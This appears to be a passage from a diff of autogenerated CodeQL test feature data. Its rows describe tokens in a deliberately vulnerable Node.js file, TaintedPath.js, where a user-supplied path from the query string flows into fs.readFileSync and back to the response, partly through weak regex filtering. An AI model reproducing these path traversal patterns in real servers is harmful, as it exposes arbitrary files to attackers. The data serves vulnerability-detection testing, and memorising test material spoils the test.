autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | exceptional return of res.wri ... lpath)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | exceptional return of res.wri ... lpath)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | res.wri ... lpath)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | res.wri ... lpath)) | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | res.wri ... lpath)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | res.wri ... lpath)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | res.wri ... lpath)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:23:105:27 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:23:105:27 | write | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:105:23:105:27 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:23:105:27 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:23:105:27 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:30 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:30 | fs | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:30 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:30 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:30 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:43 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:43 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:43 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:43 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:43 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | exceptional return of fs.read ... alpath) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | exceptional return of fs.read ... alpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | exceptional return of fs.read ... alpath) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | exceptional return of fs.read ... alpath) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | exceptional return of fs.read ... alpath) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | fs.read ... alpath) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | fs.read ... alpath) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | fs.read ... alpath) | contextFunctionInterfaces | views_local(req, res) | @@ -5569,6 +61851,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | fs.read ... alpath) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | fs.read ... alpath) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:105:29:105:53 | fs.read ... alpath) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:105:32:105:43 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:32:105:43 | readFileSync | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:105:32:105:43 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:32:105:43 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:32:105:43 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:105:45:105:52 | realpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:105:45:105:52 | realpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:105:45:105:52 | realpath | calleeImports | fs | @@ -5578,6 +61865,52 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:105:45:105:52 | realpath | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:105:45:105:52 | realpath | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:105:45:105:52 | realpath | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:111:5:111:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:5:111:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:5:111:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:5:120:2 | server ... ove.\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:5:120:2 | server ... ove.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:5:120:2 | server ... ove.\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:14:111:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:14:111:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:14:111:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:14:111:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:14:111:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:14:111:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:14:120:2 | exceptional return of http.cr ... ove.\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:14:120:2 | exceptional return of http.cr ... ove.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:14:120:2 | exceptional return of http.cr ... ove.\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:14:120:2 | http.cr ... ove.\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:14:120:2 | http.cr ... ove.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:14:120:2 | http.cr ... ove.\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:19:111:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:19:111:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:19:111:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | fs | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | this | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | url | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:32:111:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | functio ... bove.\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | functio ... bove.\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | functio ... bove.\\n} | calleeImports | http | @@ -5585,6 +61918,86 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | functio ... bove.\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | functio ... bove.\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | functio ... bove.\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:32:120:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:41:111:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:111:46:111:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:10 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:7:112:48 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:16 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:16 | url | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:16 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:22 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:22 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:37 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:43 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:43 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:48 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:14:112:48 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:18:112:22 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:18:112:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:18:112:22 | parse | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:18:112:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:18:112:22 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:24:112:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:24:112:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:24:112:26 | req | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:24:112:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:24:112:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:112:24:112:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:112:24:112:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:112:24:112:30 | req.url | calleeImports | url | @@ -5594,6 +62007,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:112:24:112:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:112:24:112:30 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:112:24:112:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:112:28:112:30 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:28:112:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:28:112:30 | url | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:28:112:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:28:112:30 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:112:33:112:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:112:33:112:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:112:33:112:36 | true | calleeImports | url | @@ -5603,11 +62021,71 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:112:33:112:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:112:33:112:36 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:112:33:112:36 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:112:39:112:43 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:39:112:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:39:112:43 | query | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:39:112:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:39:112:43 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:112:45:112:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:45:112:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:112:45:112:48 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:112:45:112:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:112:45:112:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | contextFunctionInterfaces | views_local(req, res) | +| 